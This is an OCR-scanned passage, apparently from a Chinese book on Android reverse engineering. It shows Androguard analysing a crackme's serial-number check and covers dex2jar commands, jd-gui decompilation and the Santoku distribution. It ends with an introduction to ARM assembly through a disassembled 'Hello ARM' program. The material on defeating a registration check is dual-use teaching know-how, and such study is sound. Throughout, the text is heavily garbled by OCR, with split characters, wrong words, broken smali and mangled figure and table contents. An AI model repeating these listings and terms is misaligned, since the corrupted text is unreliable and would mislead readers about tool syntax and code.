对 象 保存 了 dex 文 件 中 所 有 的 类 、 方 法 、 字 段 的 信息 ， 这 些 信息 都 是 以 对 象 


的 方式 进行 提供 的 ， 而 且 都 以 dCLASS 开头 。 例 如 
“d.CLASS_Laaa_bbb_ccc”， 表 示 dex 文 件 中 的 aaa.bbb.ccc 类 。 方 法 的 名 称 是 
在 类 名 称 后 添加 以 METHOD 开头 的 方法 字符 串 ， 例 如 
"d.CLASS Laaa bbb ccc. METHOD ddd Ljava lang StringV" , X 示 
aaa.bbb.ccc 类 的 “void ddd(String)” 方 法 。 字 段 的 名 称 是 在 类 名 称 后 添加 以 
FELD 开头 的 字段 声明 字符 om, ww" 如 
*d.CLASS Laaa bbb ccc.FIELD _this_0”， 表 示 aaa.bbb.ccc 类 的 this$0 字 段 。 

按照 上 面 的 命名 规则 ， 我 们 查看 MainActivity$2 的 OnClick0 方 法 ， 执 行 
以 下 命令 。 

d.CLASS Lcom droider crackme0502 MainActivity 2.METHOD onClick.pretty show() 


pretty_show() 用 来 显示 onClick 0 方法 的 代码 ， 如 图 5-23 所 示 。 
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Activity$2;-»this$0 Lcom/droider/crackme0502/MainActivity; 

2. (t ) iget-object v3, v4, Lcom/droider/crackme0502/Main 
Activity$2;-»this$0 Lcom/droider/crackme0502/MainActivity; 

Sut ) invoke-static v3, Lcom/droider/crackme0502/MainActi 
vity; -»access$1(Lcom/droider/crackme0502/MainActivity; )Landroid/widget/EditText; 

4 ( ) move-result-object v3 

- M ) invoke-virtual v3, Landroid/widget/EditText ; -»getTex 
t()Landroid/text/Editable; 

6 ( ) move-result-object v3 

7 ( ) invoke-interface v3, Landroid/text/Editable; -»toString 
()Ljava/lang/String; 

8 ( ) move-result-object v3 

9 ( ) invoke-direct v0, v2, v3, Lcom/droider/crackme0502/ 
MainActivity$SNChecker; -»«init»(Lcom/droider/crackme0502/MainActivity; Ljava/lan 
g/String;)V 

10 ( ) invoke-virtual vð, Lcom/droider/crackme0502/MainActi 
vity$SNChecker; -»isRegistered()Z 

11 ( ) move-result v2 

12 ( ) if-eqz v2, *15 


13 ( ) const-string vl, '\xe6\xb3\xa8\xe5\x86\x8c\xe7\xað 
\x81\xe6\xad\xa3\xe7\xal\xae' 


图 5-23 MainActivity$2 的 OnClick() 方 法 


在 代码 的 最 下 面 ， 有 如 下 一 段 内 容 。 


RHIEEREHEHEE HEN XREF 

T: Lcom/droider/crackme0502/MainActivity; access$1 
(Lcom/droider/crackme0502/MainActivity;)Landroid/widget/EditText; c 

T: Lcom/droider/crackme0502/MainActivityS$SNChecker; «init- 
(Lcom/droider/crackme0502/MainActivity; Ljava/lang/String;)V 24 

T: Lcom/droider/crackme0502/MainActivity$SNChecker; isRegistered ()Z 2a 

THETEREREREREREORERERE EIER EE EE 


上 面 的 代码 为 方法 的 交叉 引用 区 ， 开 头 的 字母 T 表 示 后 面 指定 的 方法 被 
本 方法 引用 ， 除 此 之 外 ， 它 还 可 以 是 字母 F， 表 示 本 方法 被 其 它 的 方法 所 引 
用 。 

除了 使 用 pretty_show0O) 显 示 反 汇编 代码 外 ， 还 可 以 使 用 source() 直 接 显示 
Java 源 码 ， 不 过 笔者 本 机 并 未 测试 成 功 。 

最 后 是 dx 对 象 ， 它 可 以 实现 字符 串 、 字 段 、 方 法 、 包 名 的 搜索 ， 使 用 
方法 如 下 。 

dx.tainted variables.get string( « 8 KB E fg i») 

show. Path(d, dx.tainted packages.search packages(« £1 $$» )) 

这 两 个 方法 是 Androguard 作 者 在 wiki 页 上 公布 的 ， 笔 者 本 机 并 未 测试 成 
功 。 

androlyze.py 的 其 它 的 功能 笔者 就 不 介绍 了 ， 读 者 可 以 自己 动手 多 试 。 
同时 ， 从 本 节 对 Androguard 的 使 用 介绍 中 可 以 看 出 ， 目 前 Androguard 在 兼容 
性 与 稳定 性 方面 有 待 加 强 。 


5.8 ”其 它 静 态 分 析 工 具 


在 静态 分 析 Android 程 序 时 ， 除 了 使 用 IDA Pro 与 Androguard 外 ， 还 有 很 
多 其 它 的 静态 工具 。 它 们 大 多 是 以 ApkTool、BakSmali、JAD 与 Androguard 
为 基础 ， 进 行 扩展 实现 的 ， 其 中 就 包括 一 款 名 为 ApkInspector 的 静态 分 析 工 
具 。ApkInspector 由 国人 郑 聪 开发 ， 拥 有 类 似 IDA Pro 的 流程 图 显示 功能 ， 支 
持 反 汇编 代码 语法 高 亮 、 字 符 串 搜索 、 函 数 和 变量 重 命名 。 它 是 honeynet 
2011 中 的 一 个 项 目 ， 在 2011 年 的 GSOC (Google Summer Of 中 该 软件 
表现 突出 。 今 年 的 GSOC2012 上 该 工具 有 提出 更 新 与 改进 ， 不 过 目前 仍 未 有 


它 的 更 新 版 本 可 供 下 载 ， 该 软件 的 安装 配置 过 程 比较 繁 珊 ， 笔 者 在 此 不 介 
绍 它 的 使 用 ， 感 兴趣 的 读者 可 以 访问 它 的 项 目 主 页 
https://bitbucket.org/ryanwsmith/apkinspector3A BX &l|' o 


5.9 阅读 反 编 译 的 Java 代 码 


在 分 析 大 型 软件 时 ， 为 了 弄 清 程序 的 结构 框架 ， 需 要 花费 掉 大 量 的 时 
间 与 精力 来 阅读 smali 人 代码， 这 无 疑 是 分 析 成 本 的 一 大 开销 。 然 而 ，Android 
程序 大 多 数 情 况 下 是 采用 Java 语 言 开发 的 ， 传 统 意义 上 的 Java 反 汇编 工具 依 
然 能 够 派 上 用 场 。 


5.9.1 ”使 用 dex2jar 生 成 jar 文 件 


在 第 4 章 中 介绍 Android 程 序 生 成 步骤 时 曾经 讲 到 过 ， 生 成 apk 文 件 的 其 
中 一 个 环节 就 是 将 Java 语 言 的 字 节 码 转 换 成 Dalvik 虚 拟 机 的 字 节 码 。 那 么 ， 
这 个 转换 的 过 程 可 逆 吗 ? 答案 是 : 可 以 的 。 使 用 开源 的 dex2jar 工 具 即 可 。 

dex2jar 的 官网 是 http://code.google.com/p/dex2jar/， 目 前 最 新 版 本 为 
0.0.9.9， 将 下 载 下 来 的 dex2jar 压 缩 包 解压 ， 然 后 将 解压 后 的 文件 夹 添加 到 系 
统 的 PATH 环境 变量 中 ， 在 命令 提示 符 下 输入 以 下 命令 : 

d2j-dex2jar xxx.apk 

稍 等 片刻 就 会 在 同 目录 下 生成 一 个 jar 文 件 。dex2jar 是 一 个 工具 包 ， 除 
了 提供 dex 文 件 转换 成 jar 文 件 外 ， 还 提供 了 一 些 其 它 的 功能 ， 每 个 功能 使 用 
一 个 bat 批 处 理 或 sh 脚本 来 包装 ， 只 需 在 Windows 系 统 中 调用 bat 文 件 、 在 
Linux 系 统 中 调用 sh 脚本 即 可 。 

d2j-apk-sign 用 来 为 apk 文 件 签名 。 命 令 格式 : d2j-apk-sign xxx.apko 

d2j-asm-verify 用 来 验证 jar 文 件 。 命 令 格式 : d2j-asm-verify -d xxx.jaro 

d2j-dex2jar 用 来 将 dex 文 件 转换 成 jar 文 件 。 命 令 格式 : d2j-dex2jar 


xxx.apk 


d2j-dex-asmifier 用 来 验证 dex 文 件 。 命 令 格 式 : d2j-dex-asmifier 
XXX.dexo 

d2j-dex-dump 用 来 转 存 dex 文 件 的 信息 。 命 令 格式 : d2j-dex-dump 
XXX.apk out.jaro 

d2j-init-deobf 用 来 生成 反 混 清 jar 文件 时 的 初始 化 配置 文件 。 

d2j-jar2dex 用 来 将 jar 文 件 转 换 成 dex 文 件 。 命 令 格式 : d2j-jar2dex 
XXX.apko 

d2j-jar2jasmin 用 来 将 jar 文 件 转换 成 jasmin 格 式 的 文件 。 命 令 格 式 : d2j- 
jar2jasmin XXX.jar 

d2j-jar-access 用 来 修改 jar 文 件 中 的 类 、 方 法 以 及 字段 的 访问 权限 。 

d2j-jar-remap 用 来 重 命名 jar 文 件 中 的 包 、 类 、 方 法 以 及 字段 的 名 称 。 

d2j-jasmin2jar 用 来 将 jasmin 格 式 的 文件 转换 成 jar 文 件 。 命 令 格式 : d2j- 
jasmin2jar dir 

dex2jar 为 d2j-dex2jar 的 副本 。 

dex-dump 为 d2j-dex-dump 的 副本 。 


5.9.2 ”使 用 jd-gui 查 看 jar 文 件 的 源码 


为 了 达到 源码 级 的 反 编 译 效 果 ， 可 以 使 用 Java 反 编译 工具 JAD 将 jar 文 件 
转换 成 Java 源 文件 ， 目 前 JAD 官网 已 经 无 法 访问 ， 可 以 通过 
http://www.varaneckas.com/jad/ 下 载 到 JAD 的 可 执行 文件 。 

在 这 里 ， 笔 者 推荐 使 用 jd-gui。jd-gui 是 一 款 用 C++ 开 发 的 Java 反 编译 工 
具 ， 支 持 Windows、Linux 和 苹果 Mac OS 三 个 平台 。jd-gui 是 免费 的 ， 而 且 反 
编译 效果 不 错 ， 该 工具 省 掉 了 将 jar 文 件 转 换 成 Java 源 文件 的 步骤 ， 直 接 以 源 
码 的 形式 显示 jar 文 件 中 的 内 容 ， 可 以 从 官方 免费 获取 。 官 方 主页 为 : 
http://java.decompiler.free.fr/，jd-gui 运 行 后 效果 如 图 5-24 所 示 。 


& Java Decompiler — Nain&ctivity.class DAR 
File Edit Navigate Search Help 
wi 4|o 


crackme-dex2jar-jar2jasmin-jasmin2jar.jar Xx zi 
| (P android BuildConfig.class MainActivity.dass x id 
|| Œ con. ároider 
D-E anno ) ^ 
B-BB crackne0502 catch (Exception localException) 
由 国 BuildConfig { 
S [J MainActivity. while (true) 
B-Q msinketivity localException.printStackTrace():; 
3 (9 SNChecker } 
a sn ; String } 
© SHChecker (String) 
O ishegistered() : boolean public void onCreate (Bundle paramBundle) 
7 btnÀnno : Button { 
o btnCheckSH : Button 
o edtSN : EditText 
getÀnnotations() : void 
© onCreate(Bundle) : void 
© onCreateÜptionsMenu(Menu) : bool, Xt) findViewBy 
由 - 国 liyApp ckListener (new View.OnClickListener () 
a- [N R 
public void onClick (View paramView) 
{ 
MainActivity. this.getAnnotations (); 
} 
CkSN. setOnClickListener (new View.OnClickListener() 
t 
public void onClick(View paramView) 
t 
if (new MainActivity.SNChecker(MainActivity.this, MainActivity.this.edtSN.getText().toString()).isRegistered()); 
for (String str ; str = 248iR") 
{ 
Toast.makeText(MainActivity.this, str, 0).show(); 
return; 
H 
} 
n: 
} 
public boolean 
{ . g 
< Es > 


5-24 ”使 用 jd-gui 查 看 jar 文 件 的 源码 


除了 反 编译 功能 外 ，jd-gui 还 带 有 强大 的 搜索 功能 ， 在 主 界面 按 下 快捷 
键 CTRL+F， 会 在 程序 的 状态 栏 显 示 一 个 搜索 工具 条 ， 输 入 要 搜索 的 内 容 ， 
当前 打开 的 反 编译 窗口 会 高 之 显示 搜索 结果 。 除 此 之 外 ， 点 击 菜 单项 
“Search > Search” 会 弹出 搜索 对 话 框 ， 如 图 5-25 所 示 ， 搜 索 框 列举 出 了 
isRegistered() 方 法 在 哪些 文件 中 被 引用 过 。 


Search 


Search string (* = any string, ? = any character): 


| isRegistered 


Search For Limit To 
[]Type []Constructor String Constant Declarations 
C] Field Method References 


3 matching items: 


O D:\workspace\chapter5\5.9\5.9.1\crackme-dex2jar-jar2jasmin-jasmin; 
日- 出 com.droider.crackme0502 

[J] MainActivity.SNChecker 

四 MainActivity 

JJ MyApp 


图 5-25 jd-gui 的 搜索 功能 


5.10 ”集成 分 析 环 境 


本 章 的 前 面部 分 介绍 的 Android 静 态 分 析 工 具 包括 ApkTool、BakSmali、 
Androguard、dex2jar、jd-gui， 这 些 工具 中 除了 Androguard 不 能 在 Windows 平 
台 上 运行 外 ， 其 它 的 都 能 支持 跨 平 台 ， 可 以 在 windows 平 台 上 民 好 的 运行 。 

如 果 读 者 觉得 单独 下 载 配 置 这 些 工具 麻烦 (其 实 本 书 配 套 源 代码 中 有 
提供 ) ， 不 妨 使 用 另 一 款 集成 分 析 环 境 santoku。santoku 实 质 是 一 款 定制 的 
Ubuntu 12.04 系 统 镜像 ， 与 其 它 Ubuntu 系 统 相 比 ， 它 具有 如 下 特点 : 


santoku 


1. 集成 了 大 量 主流 的 Android 程 序 分 析 工 具 ， 为 分 析 人 员 节 省 分 析 环 境 
配置 所 需 的 时 间 。 

2. 集成 移动 设备 取证 工具 。 支 持 Android、IPhone 等 移动 设备 的 取证 工 
作 。 

3. 集成 渗透 测试 工具 。 

4. 集成 网 络 数据 分 析 工 具 。 在 分 析 Android 病 毒 、 木 马 等 程序 时 ， 这 些 
工具 特别 有 用 。 

5. 采用 LXDE 作 为 系统 的 桌面 环境 ， 界 面 与 Windows XP 非 常 相似 ， 符 
合 中 国人 使 用 习惯 。 

6. 正 处 于 beta 阶 段 ， 但 整个 项 目 显得 很 有 活力 ， 相 信 将 来 的 更 新 和 维 
护 也 会 不 错 。 

santoku 的 初衷 是 为 了 提供 一 套 完整 的 移动 设备 司法 取证 环境 。 但 很 显 
然 它 集成 的 Android 程 序 分 析 工 具 ， 会 给 我 们 的 分 析 工 作 带 来 很 多 便捷 。 
santoku-linux BS È 75 W uh Y https://santoku-linux.com ， 目 前 最 新 版 本 alpha 
0.3。 如 图 5-26 所 示 ，santoku-linux 启 动 后 的 界面 非常 清新 。 


È$ Accessories 
@ internet 
f Programming b i Development Tools b |B Bulb Security SPF 
& Device Forensics b & Dex2Jar 
P System Tools b a Penetration Testing bw Jasmin 
X Preferences > > JD-GUI 
Run iu Wireless Analyzers b 多 Mercury 
多 Logout @ Help » Radare2 
mA— IPS Y AA Q Tutorials t» Smali s i ooo e S7 onas O 
Goss. ine cu 


图 5-26 ”santoku-linux 启 动 界面 


如 果 读 者 还 在 为 安装 配置 Androguard 烦 恼 的 话 ， 不 妨 下 载 安装 santoku 
试 试 ， 目 前 它 集成 的 Androguard 和 版 本 为 1.5， 虽 然 不 是 最 新 版 本 ， 但 通过 它 
可 更 新 到 1.6 版 ， 只 需 下 载 Androguard 的 源码 后 ， 修 改 两 个 库 文件 的 makefile 

(详细 位 置 请 参考 Androguard 安 装 方法 ) ， 然 后 执行 一 次 make 命 令 即 可 。 

santoku 详 细 的 安装 与 使 用 方法 笔者 就 不 介绍 了 ， 它 里 面 集成 的 大 多 数 
静态 分 析 工 具 在 前 面 的 章节 中 都 已 经 介绍 过 了 ， 相 信 读 者 也 都 已 经 掌握 
fo 


5.1 ”本章 小 结 


静态 分 析 是 软件 分 析 过 程 中 最 基础 也 是 最 重要 的 一 种 手段 ， 本 章 主要 
从 Android 程 序 的 特点 、smali 文 件 的 代码 结构 、 静 态 分 析 工 具 的 使 用 等 几 个 
方面 来 介绍 如 何 分 析 一 个 完整 的 Android 程 序 。 对 于 刚 接触 Android 程 序 分 析 
的 读者 来 说 ， 建 议 多 阅读 反 编 译 后 的 smali 文 件 ， 而 不 是 直接 使 用 jd-gui 等 工 
具 来 阅读 Java 源 码 ， 这 样 有 助 于 提高 反 编 译 代码 的 阅读 能 力 ， 以 后 分 析 混 淆 
过 的 APK 文 件 或 者 jd-gui 派 不 上 用 场 时 就 不 至 于 手足 无 措 。 


第 6 章 ”基于 Android 的 ARM 汇 编 语 
言 基 础 一 一 逆向 原生 ! 


谈 到 学 习 ARM 汇 编 语 
本 讲 Android 安 全 的 书籍 会 
后 面 的 6.2.1 节 中 作 说 明 。 

阅读 本 书 的 读者 可 能 曾经 有 过 Windows 或 Linux 平 台 软 件 开 发 的 经 验 ， 
也 可 能 是 从 未 涉足 其 它 平台 ， 只 是 纯粹 的 Android 程 序 员 。 本 书 不 假定 读者 
有 任何 的 汇编 语言 基础 ， 如 x86 汇 编 与 AT&T 汇 编 。 如 果 读 者 曾经 学 习 过 
ARM 汇 编 语 言 ， 可 以 跳 过 本 章 直 接 学 习 下 一 章 ， 而 如 果 您 之 前 未 曾 接触 过 
ARM 汇 编 语 言 ， 也 不 要 感到 肖 形 ， 因 为 接 下 来 笔者 将 会 从 掌握 原生 程序 逆 
向 技术 的 角度 出 发 ， 带 领 大 家 一 起 学 习 ARM 汇 编 的 基础 知识 。 


言 ， 许 多 读者 心中 可 能 会 有 一 个 疑问 。 为 什么 一 
涉及 到 ARM 汇 编 语言 知识 ? 关于 这 个 问题 我 将 在 


61 Android 与 ARM 处 理 器 


本 节 主 要 介绍 ARM 处 理 器 的 发 展 史 ， 以 及 Android 系 统 与 ARM 处 理 器 
的 关系 。 


6.1.1 ARM 处 理 器 架构 概述 


ARM 是 Advanced RISC Machine 的 首 字母 缩写 。 在 开发 人 员 的 眼中 ， 
ARM 可 以 称 之 为 一 家 启 入 式 处 理 器 的 提供 商 ， 也 可 以 理解 为 一 种 处 理 器 的 
架构 ， 还 可 以 将 它 当 作 一 套 完 整 的 处 理 器 指令 集 。 

ARM 公 司 有 着 悠久 的 历史 。 起 先 它 只 是 艾 康 电脑 公司 于 1983 年 开始 的 
一 个 开发 计划 ，1985 年 艾 康 电脑 设计 出 了 第 一 代 32 位 的 处 理 器 ， 采 用 了 精 
简 指 令 集 ， 简 称 为 ARM (Acorn RISC Machine) ， 同 年 的 4 月 26 日 ， 美 国 的 


VLSI 公司 生产 出 了 第 一 颗 Acorn RISC 处 理 器 ， 这 就 是 ARM1 处 理 器 。1986 
年 ARM2 问 世 ，ARM2 具 有 32 位 的 数据 总 线 、26 位 的 寻 址 空间 ， 并 提供 64 
MB 的 寻 址 范围 与 16 个 32 位 的 暂 存 器 ， 它 是 第 一 块 被 量 产 的 ARM 架 构 的 处 理 
器 。1989 年 ARM3 问 世 ， 它 采用 了 4KB 的 高 速 缓存， 性 能 较 前 两 个 版 本 有 很 
大 的 突破 。1990 年 ，ARM 获 得 苹果 公司 与 VLSI 公司 的 资助 ，Acorn RISC 
Machine 也 正式 更 名 为 Advanced RISC Machine， 从 此 ，ARM 成 为 了 一 家 独 
立 的 处 理 器 公司 。1998 年 4 月 17 日 ，ARM 公 司 在 英国 伦敦 证 交 所 和 美国 纳 斯 
达 克 上 市 。 之 后 的 ARM 公 司 迅猛 发 展 ， 截 至 2007 年 底 ，ARM 核 心心 片 出 货 
量 已 突破 100 亿 颗 ， 这 也 奠定 了 ARM 在 语 入 式 及 移动 芯片 领域 的 王者 地 位 。 


6.1.2 ” ARM 处 理 器 家 族 


为 了 满足 不 同 环境 下 的 需求 ，ARM 公 司 推出 了 各 种 各 样 基于 通用 架构 
的 处 理 器 。 如 图 6-1 所 示 ， 整 个 ARM 处 理 器 家 族 分 成 Classic、Embedded、 
Application 三 大 类 。 


Classic Embedded, Applicaton 
会 ARM Processors IGOTtex Processors Gorteek Processors. 


SOrTEX-ATS 


SOLTex- A 
COLIex-AD 


GOTLTtex- Ay; 


(sOrtex=AS 
| ARM11 race esse 
é 


Cortex- R4 
Cortex M4 
— 
Cortex M1 


ARM7 Cortex-MO 


图 6-1 ARM 处 理 器 家 族 


Classic 被 称 为 经 典 系列 ， 早 先 基于 ARM 架 构 的 处 理 器 以 数字 命名 ， 这 
种 命名 方式 一 直 从 ARM1 延 续 到 ARM11， 从 ARM11 之 后 ， 没 有 再 采用 数字 
来 命名 处 理 器 的 版 本 ， 而 是 采用 Cortex 来 命名 ， 当 时 还 有 人 说 Cortex 就 是 
ARM12。 Cortex 型 号 的 处 理 器 分 为 三 个 系列 : Cortex-A、Cortex-M 与 Cortex- 
Ro 

Cortex-A 系 列 的 处 理 器 被 广泛 应 用 于 智能 手机 、 上 网 本 、 电 子 书 以 及 数 
字 电 视 等 常见 的 电子 设备 ， 本 书 讨论 的 Android 以 及 其 它 主流 的 手机 系统 大 
部 分 都 使 用 它 。 目 前 ， 市 场 上 大 部 分 Android 手 机 采用 Cortex-A8 处 理 器 ， 部 
分 高 端的 手机 或 平板 设备 甚至 采用 了 Cortex-A9 或 Cortex-A15 处 理 器 。 
Cortex-M 系 列 处 理 器 主要 是 针对 微 控 制 器 领域 开发 的 ， 该 系列 的 设计 理念 
是 高 能 效 、 低 功 耗 ， 其 中 Cortex-M3 为 比较 经 典 的 版 本 。Cortex-R 系 列 处 理 
器 主要 面向 深层 同 入 式 实时 应 用 ， 对 低 功 耗 、 展 好 的 中 断 行为 、 卓 越 性 能 
以 及 与 现 有 平台 的 高 兼容 性 这 些 需 求 进行 了 平衡 考虑 。 

尽管 ARM 架 构 的 处 理 器 版 本 众多 ， 但 其 中 很 多 版 本 的 处 理 器 架构 是 相 
同 的 ， 相 同 版 本 的 处 理 器 兼容 同一 套 ARM 指 令 集 。 目 前 ，ARM 架 构 与 处 理 
器 家 族 对 照 如 表 6-1 所 示 。 


表 6-1 _ ARM 处 理 器 家 族 


Ao H 处 理 器 家 族 

ARMvI ARMI 

ARMv2 ARM2., ARM3 

ARMv3 ARM6, ARM7 

ARMv4 StrongARM, ARM7TDMI. ARM9TDMI 
ARMvS5 ARMT7EJ. ARM9E. ARMIOE, XScale 

ARMv6 ARMII., ARM Cortex-M 

ARMv7 ARM Cortex-A. ARM Cortex-M. ARM Cortex-R 
ARMv8 尚未 有 商品 问世 。 预 计 文 持 64 位 的 数据 与 寻 址 


可 以 发 现 ， 跨 度 比 较 大 的 是 ARM7， 不 同型 号 的 ARM7 处 理 器 有 v3-v5 
三 种 架构 。 从 ARMv4 版 本 以 后 ， 加 入 了 一 种 16 位 指令 模式 ， 叫 做 Thumb。 
Thumb 措 令 集 可 以 看 作 是 ARM 指 令 压 缩 形式 的 子 集 ， 具 有 16 位 的 代码 密 
度 。Thumb 指 令 体系 并 不 完整 ， 只 支持 通用 功能 ， 必 要 时 仍 需 要 使 用 ARM 


HS. ARMvVv5 加 入 了 VEFPv2 与 Jazelle 技 术 ，VFP 为 ARM 架 构 的 处 理 器 提供 
了 浮 点 运算 能 力 ，Jazelle 技 术 允 许 在 某 些 架构 的 硬件 上 加 速 运行 Java 
bytecode。 在 讲解 Android 系 统 的 Dalvik 虚 拟 机 时 曾经 说 过 ，Dalvik 虚 拟 机 并 
非 使 用 传统 的 JVM 来 运行 Android 程 序 ， 而 是 自己 实现 了 一 套 字 节 码 加 载 与 
运行 机 制 ， 因 此 ， 这 项 技术 对 Android 是 没有 任何 用 处 的 。ARMv6 加 入 了 
Thumb-2 技 术 支 持 ，Thumb-2 扩 充 了 受 限 的 16 位 Thumb 指 令 集 ， 以 额外 的 32 
位 指令 让 指令 集 的 使 用 更 广泛 ， 除 此 之 外 ，ARMv6 加 入 了 SIMD 与 
TrustZone 技 术 ， 新 的 SIMD 多 媒体 指令 扩展 可 适用 于 众多 软件 应 用 领域 ， 如 
视频 和 音频 编 解 码 ， 使 得 在 处 理 音 频 和 视频 时 ， 性 能 提高 了 75% 以 上 ， 
TrustZone 技 术 为 ARM 加 入 了 安全 性 控制 ， 避 免 产品 受到 外 部 的 恶意 攻击 ， 
目前 并 未 发 现 Android 系 统 中 引入 该 项 技术 。ARMv7 加 入 了 VFPV3 与 NEON 
支持 ，NEON 技 术 为 SIMD 体 系 结构 的 扩展 ， 被 称 为 Advance SMD, NEON 
在 执行 上 比 传统 SIMD 占 用 更 少 的 指令 周期 ， 性 能 方面 得 到 了 大 幅度 的 提 
供 ， 另 外 ，NEON 加 入 了 许多 多 媒体 格式 的 硬 解 码 ， 如 MPEG-4、H.264 等 ， 
这 使 得 ARMv7 在 多 媒体 应 用 方面 获得 更 好 的 用 户 体验 。 最 后 是 ARMv8， 该 
系列 的 处 理 器 尚未 有 产品 上 市 ， 但 可 以 通过 ARM 官 方 网 站 了 解 该 架构 的 一 
些 情况 。ARMv8 除 了 完整 的 向 下 指令 集 兼容 外 ， 还 提供 了 32 位 与 64 位 两 种 
执行 状态 ， 也 就 是 说 ， 从 ARMv8 起 ，ARM 架 构 的 处 理 器 进入 了 64 位 时 代 ， 

站 令 集 方面 ，ARMv8 提 供 了 A32 的 ARM 指 令 集 、T32 的 Thmub 指 令 集 以 及 
A64 的 AArch64 指 令 集 。 


6.1[3 ”Android 支 持 的 处 理 器 架构 


Android 最 初 选 择 了 ARM 作 为 平台 设备 的 处 理 器 架构 。 查 看 Android 系 
统 源码 的 Bionic 库 以 及 Dalvik 虚 拟 机 的 实现 ， 可 以 发 现 Android 专 门 针 对 
ARM 平 台 做 了 不 少 优化 。 查 看 各 版 本 Android 源 码 的 dalvik/vm/mterp 目 录 ， 
可 以 发 现 Android 1.6 版 本 中 只 支持 armv4 与 armv5te 指 令 集 ， 到 了 Android 2.0 
增加 了 arm-vfp、armv6 与 armv6t2 指 令 集 ， 到 了 Android 2.2 增 加 了 armv7-a 指 


AN 
SE, 


在 处 理 器 架构 方面 ，Google 从 一 开始 就 没 打算 将 筹码 完全 压 在 ARM 身 
上 ， 从 Android1.6 开 始 ，Dalvik 虚 拟 机 就 提供 了 对 x86 架 构 的 支持 。 到 了 
Android 2.2， 加 入 了 对 x86-atom 的 支持 ，atom 是 Intel 专 为 移动 设备 开发 的 一 
款 微型 处 理 器 ， 这 也 是 mntel 争 奔 移 动 市 场 迈 出 的 第 一 步 ， 这 款 处 理 器 中 文 命 
名 为 “ 凌 动 ”， 目 前 市 场 上 已 经 能 够 看 到 基于 它 的 Android 手 机 与 上 网 本 了 。 
截止 目前 最 新 的 Android 4.1， 加 入 了 对 MIPS 的 支持 。 因 此 ， 如 今 的 Android 
支持 ARM、x86、MIPS 三 种 架构 的 处 理 器 。 

不 同 的 架构 会 涉及 不 同 的 知识 面 ， 本 书 不 可 能 对 每 一 种 架构 的 知识 进 
行 完 全 的 细致 讲解 ， 因 为 这 些 都 是 相应 的 处 理 器 手册 所 做 的 事情 。 本 书 选 
择 了 目前 最 为 流行 的 ARM 架 构 ， 通 过 介绍 常用 的 ARM 指 令 及 其 语法 ， 为 没 
有 ARM 基 础 的 读者 做 一 个 简单 的 科普 ， 为 下 一 章 Android 原 生 程 序 的 逆向 做 
好 准备 。 如 果 读 者 对 其 它 两 种 处 理 器 架构 或 相关 的 指令 集 系 统 感 兴趣 ， 可 
以 访问 相应 的 处 理 器 官方 网 站 进行 了 解 。 


62 ”原生 程序 与 ARM 汇 编 语言 一 一 逆向 你 的 原生 
Hello ARM 


本 小 节 主 要 介绍 原生 程序 与 ARM 汇 编 语言 的 关系 ， 让 读者 认识 到 ARM 
汇编 语言 在 原生 程序 分 析 过 程 中 的 重要 性 。 


6.2.1 原生 程序 逆向 初步 


有 过 Java 开 发 经 验 的 读者 一 定 会 知道 ，Java 程 序 的 安全 多 依赖 于 代码 混 
淆 技术 ， 这 种 技术 通过 更 改 程序 中 的 方法 、 字 段 名 来 增加 静态 分 析 的 难 
度 ， 从 而 达到 防止 程序 被 破解 的 目的 。Android 系 统 采用 Java 作 为 其 平台 软 
件 的 基础 开发 语言 ， 代 码 混 淆 技术 也 理所当然 的 成 为 了 保护 程序 的 “基础 ” 
手段 。 但 代码 混淆 技 术 也 有 很 多 弊端 (具体 的 代码 混淆 技术 会 在 本 书 第 十 
章 进行 介绍 ) ， 不 能 满足 对 安全 需求 较 高 的 行业 及 商业 软件 ，Android NDK 
的 问世 ， 使 得 开发 人 员 可 以 通过 C/C++ 代码 来 编写 软件 的 核心 功能 代码 ， 这 


些 代 码 通过 编译 会 生成 基于 特定 处 理 器 的 可 执行 文件 ， 对 于 使 用 ARM 处 理 
器 的 Android 手 机 来 说 ， 它 最 终 会 生成 相应 的 ARM elf 可 执行 文件 ， 分 析 人 
员 要 想 分 析 软 件 的 核心 功能 只 能 从 这 个 elf 文 件 入 手 。 然 而 分 析 ARM elf 文 件 
比 想 象 中 要 困难 的 多 ， 摆 在 分 析 人 员 面 前 的 首要 问题 就 是 需要 对 ARM 指 令 
集 有 所 了 解 ， 因 为 无 论 是 静态 分 析 还 是 动态 调试 ARM elf 代 码 都 需要 具备 基 
本 的 ARM 反 汇编 代码 阅读 能 力 。 相 信 现 在 读者 应 该 能 够 理解 为 什么 本 书 会 
花 掉 一 章 来 介绍 ARM 汇 编 语言 的 知识 了 。 

下 面 先 看 本 小 节 的 实例 程序 hello， 一 个 ARM 原 生 程 序 。 将 其 拖 入 IDA 
Pro 软 件 主 窗口 ， 双 击 函 数 窗 口 的 main， 定 位 到 main 陨 数 的 代码 处 ， 内 容 如 
下 。 


EXPORT main 

2 main 

3 var C- -O0xC 

4 var 8- -8 

5 STMFD SP!, {RIL LR} 

6 ADD R11, SP, #4 

7 SUB SP, SP, #8 

8 STR RO, [R11, #var_8] 

9 STR R1, [R11, #var_C] 

10 LDR R3, =(aHelloArm - 0x8300) 
Li ADD R3; PC; R3 ; "Hello ARM!" 
12 MOV RO, R3 z GG 

14 BL puts 

14 MOV R3, #0 

T5 MOV R0; R3 

16 SUB SP, R11, "4 


lj LDMFD SP!, (R11,PC) 

从 未 接触 过 ARM 汇 编 的 读者 看 到 这 些 奇 怪 的 “符号 ”肯定 会 觉得 莫 明 其 
妙 ， 这 些 都 是 什么 东西 ”其 实 它们 就 是 由 一 条 条 ARM 汇 编 指 令 所 组 成 的 汇 
编 代 码 ， 我 们 将 其 称 为 原生 程序 的 反 汇 编 代 码 。 逆 向 原生 程序 就 是 通过 阅 


读 这 些 汇 编 代 码 来 了 解 原生 程序 的 功能 及 流程 。 下 面 我 们 来 看 看 这 段 代 码 
的 具体 含义 : 

第 1 行 的 EXPORT main” 表 明 这 个 main 国 数 是 被 程序 导出 的 。 

第 2 行 的 main 为 函数 的 名 称 。JDA Pro 能 自动 识别 原生 程序 中 所 有 的 函 
数 及 其 名 称 。 

第 3-4 行 是 IDA Pro 识 别 出 的 栈 变 量 。IDA Pro 是 通过 函数 中 分 配 的 栈 空 
间 来 识别 栈 变 量 的 ， 本 实例 是 依据 第 7 行 的 “SUB SP, SP #8” 指 令 来 完成 的 ， 
其 中 SUB 为 指令 操作 码 ， 表 示 减 法 操作 ，SP 为 堆栈 指针 寄存 器 (关于 什么 
是 寄存 器 将 在 6.2.3 节 介绍 ， 在 这 里 可 以 简单 理解 为 具有 特殊 用 途 的 变 
